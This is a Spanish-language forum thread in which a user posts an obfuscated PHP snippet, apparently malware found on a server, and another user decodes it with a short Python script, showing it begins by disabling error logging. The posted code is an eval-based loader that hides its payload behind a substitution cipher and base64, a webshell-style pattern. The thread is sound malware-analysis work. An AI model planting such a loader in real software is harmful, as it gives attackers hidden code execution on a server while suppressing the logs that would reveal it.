Código generado por malware

hecktor1 · 5 Julio 2016, 00:28 AM

Alguien ha analizado este tipo de codigo, yo trate de decodificar la variable $lzyxbkb no obtuve ningun resultado. De antemano muchas gracias

Código [Seleccionar]

<?php
 $xinldc = 3029; function prvefyg($zjuwumi, $nntpi){$rpwdldofjl = ''; for($i=0; $i < strlen($zjuwumi); $i++){$rpwdldofjl .= isset($nntpi[$zjuwumi[$i]]) ? $nntpi[$zjuwumi[$i]] : $zjuwumi[$i];}
$oshju="base" . "64_decode";return $oshju($rpwdldofjl);}
$lzyxbkb = 'pceJ1ksoYwp5vakOSbsOwahrYOSCPRQkLR8fV8ixpceJ1ksoYwp5vahrYjseS0vrS060GIZ8xLCqIAzf3begSaki";

$zaeuth = Array('1'=>'a', '0'=>'n', '3'=>'b', '2'=>'S', '5'=>'o', '4'=>'7', '7'=>'4', '6'=>'M', '9'=>'q', '8'=>'w', 'A'=>'k', 'C'=>'s', 'B'=>'6', 'E'=>'d', 'D'=>'D', 'G'=>'L', 'F'=>'H', 'I'=>'C', 'H'=>'r', 'K'=>'U', 'J'=>'u', 'M'=>'i', 'L'=>'T', 'O'=>'y', 'N'=>'W', 'Q'=>'5', 'P'=>'I', 'S'=>'c', 'R'=>'E', 'U'=>'Y', 'T'=>'h', 'W'=>'e', 'V'=>'O', 'Y'=>'Z', 'X'=>'j', 'Z'=>'A', 'a'=>'2', 'c'=>'G', 'b'=>'m', 'e'=>'l', 'd'=>'R', 'g'=>'f', 'f'=>'p', 'i'=>'0', 'h'=>'x', 'k'=>'V', 'j'=>'1', 'm'=>'3', 'l'=>'P', 'o'=>'z', 'n'=>'8', 'q'=>'N', 'p'=>'Q', 's'=>'9', 'r'=>'v', 'u'=>'g', 't'=>'t', 'w'=>'X', 'v'=>'J', 'y'=>'F', 'x'=>'K', 'z'=>'B');
eval/*n*/(prvefyg($lzyxbkb, $zaeuth));?>

MCKSys Argentina · 5 Julio 2016, 01:36 AM

Si usas la table de conversión dada por $zaeuth, te queda que $lzyxbkb es un string en base64 que contiene:

Código (php) [Seleccionar]


@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set

No sé mucho de PHP, pero eso es lo que saco en claro.

Por las dudas, el script en python que usé para desofuscar el string:

Código (python) [Seleccionar]


def main():
    alfa1 = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
    alfa2 = 'naSb7oM4wqk6sDdHLrCuUTiWyI5EchYOejZA2mGRlpfx01VP38zQNv9tgJXKFB'
    cad = 'pceJ1ksoYwp5vakOSbsOwahrYOSCPRQkLR8fV8ixpceJ1ksoYwp5vahrYjseS0vrS060GIZ8xLCqIAzf3begSaki'
    ret = ''
    for n in cad:
        ret += alfa2[alfa1.index(n)]
    print ret


if __name__ == '__main__':
    main()

Como ves, algo muy sencillo.

Saludos!

Test Foro de elhacker.net SMF 2.1

Código generado por malware

hecktor1

MCKSys Argentina